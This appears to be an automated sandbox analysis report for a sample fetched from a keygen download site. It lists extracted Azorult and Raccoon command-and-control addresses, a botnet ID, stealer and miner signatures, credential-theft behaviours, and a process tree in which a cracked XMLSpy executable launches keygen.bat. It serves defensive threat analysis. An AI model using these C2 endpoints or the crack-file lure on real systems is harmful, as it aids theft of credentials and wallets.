Analysis

  • max time kernel
    1775s
  • max time network
    1795s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    18-04-2021 17:27

General

  • Target

    https://keygenit.com/d/3563ee088d1n7s312q6.html

  • Sample

    210418-bdbbr7kjy2

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

raccoon

Botnet

562d987fd49ccf22372ac71a85515b4d288facd7

Attributes
  • url4cnc

    https://telete.in/j90dadarobin

rc4.plain
rc4.plain

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 29 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 10 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 22 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:472
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:872
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:1016
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/3563ee088d1n7s312q6.html
      1⤵
      • Enumerates system info in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:2020
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xbc,0xc0,0xc4,0x90,0xc8,0x7fef69b4f50,0x7fef69b4f60,0x7fef69b4f70
        2⤵
          PID:1548
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1120 /prefetch:2
          2⤵
            PID:1852
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1264 /prefetch:8
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:1696
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1644 /prefetch:8
            2⤵
              PID:112
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2024 /prefetch:1
              2⤵
                PID:1084
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2032 /prefetch:1
                2⤵
                  PID:544
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2300 /prefetch:1
                  2⤵
                    PID:1684
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2312 /prefetch:1
                    2⤵
                      PID:1964
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2380 /prefetch:1
                      2⤵
                        PID:1052
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2392 /prefetch:1
                        2⤵
                          PID:660
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2276 /prefetch:2
                          2⤵
                            PID:2460
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3828 /prefetch:8
                            2⤵
                              PID:2568
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=952 /prefetch:1
                              2⤵
                                PID:2704
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=940 /prefetch:1
                                2⤵
                                  PID:2720
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2916 /prefetch:8
                                  2⤵
                                    PID:2856
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3016 /prefetch:8
                                    2⤵
                                      PID:2904
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3080 /prefetch:1
                                      2⤵
                                        PID:2956
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=496 /prefetch:8
                                        2⤵
                                          PID:3040
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=104 /prefetch:8
                                          2⤵
                                            PID:2140
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4696 /prefetch:8
                                            2⤵
                                              PID:2204
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4948 /prefetch:8
                                              2⤵
                                                PID:2268
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5032 /prefetch:8
                                                2⤵
                                                  PID:2432
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4960 /prefetch:8
                                                  2⤵
                                                    PID:2604
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4968 /prefetch:8
                                                    2⤵
                                                      PID:2568
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5144 /prefetch:8
                                                      2⤵
                                                        PID:316
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5128 /prefetch:8
                                                        2⤵
                                                          PID:1096
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4932 /prefetch:8
                                                          2⤵
                                                            PID:2016
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5060 /prefetch:8
                                                            2⤵
                                                              PID:764
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5076 /prefetch:8
                                                              2⤵
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:1616
                                                            • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                              "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                              2⤵
                                                                PID:960
                                                                • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                  "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x13c,0x140,0x144,0x110,0x148,0x13ffda890,0x13ffda8a0,0x13ffda8b0
                                                                  3⤵
                                                                    PID:944
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5080 /prefetch:8
                                                                  2⤵
                                                                    PID:2352
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2736 /prefetch:8
                                                                    2⤵
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:2824
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4632 /prefetch:8
                                                                    2⤵
                                                                      PID:2924
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4552 /prefetch:8
                                                                      2⤵
                                                                        PID:1892
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4644 /prefetch:8
                                                                        2⤵
                                                                          PID:1016
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4656 /prefetch:8
                                                                          2⤵
                                                                            PID:1100
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4636 /prefetch:8
                                                                            2⤵
                                                                              PID:2476
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5088 /prefetch:8
                                                                              2⤵
                                                                                PID:2444
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4572 /prefetch:8
                                                                                2⤵
                                                                                  PID:2600
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4600 /prefetch:8
                                                                                  2⤵
                                                                                    PID:2436
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4412 /prefetch:8
                                                                                    2⤵
                                                                                      PID:2576
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3572 /prefetch:8
                                                                                      2⤵
                                                                                        PID:2212
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5180 /prefetch:8
                                                                                        2⤵
                                                                                          PID:2604
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3456 /prefetch:8
                                                                                          2⤵
                                                                                            PID:2092
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2868 /prefetch:8
                                                                                            2⤵
                                                                                              PID:2440
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4504 /prefetch:8
                                                                                              2⤵
                                                                                                PID:1896
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4084 /prefetch:8
                                                                                                2⤵
                                                                                                  PID:1784
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3448 /prefetch:8
                                                                                                  2⤵
                                                                                                    PID:2056
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2916 /prefetch:8
                                                                                                    2⤵
                                                                                                      PID:368
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3440 /prefetch:8
                                                                                                      2⤵
                                                                                                        PID:764
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4108 /prefetch:8
                                                                                                        2⤵
                                                                                                          PID:948
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4208 /prefetch:8
                                                                                                          2⤵
                                                                                                            PID:1652
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4408 /prefetch:8
                                                                                                            2⤵
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            PID:2712
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4080 /prefetch:8
                                                                                                            2⤵
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            PID:2908
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2272 /prefetch:8
                                                                                                            2⤵
                                                                                                              PID:2952
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4804 /prefetch:8
                                                                                                              2⤵
                                                                                                                PID:2968
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3668 /prefetch:8
                                                                                                                2⤵
                                                                                                                  PID:1644
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4172 /prefetch:8
                                                                                                                  2⤵
                                                                                                                    PID:3040
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4076 /prefetch:8
                                                                                                                    2⤵
                                                                                                                      PID:2336
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4940 /prefetch:8
                                                                                                                      2⤵
                                                                                                                        PID:2264
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1108,6554654697943764950,4354749040199549177,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2756 /prefetch:8
                                                                                                                        2⤵
                                                                                                                          PID:2148
                                                                                                                      • C:\Windows\system32\AUDIODG.EXE
                                                                                                                        C:\Windows\system32\AUDIODG.EXE 0x578
                                                                                                                        1⤵
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:2172
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Temp2_Altova.Xmlspy.2011.Enterprise.crack.zip\Altova.Xmlspy.2011.Enterprise.crack.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Temp2_Altova.Xmlspy.2011.Enterprise.crack.zip\Altova.Xmlspy.2011.Enterprise.crack.exe"
                                                                                                                        1⤵
                                                                                                                          PID:2900
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                                                                                                                            2⤵
                                                                                                                            • Loads dropped DLL
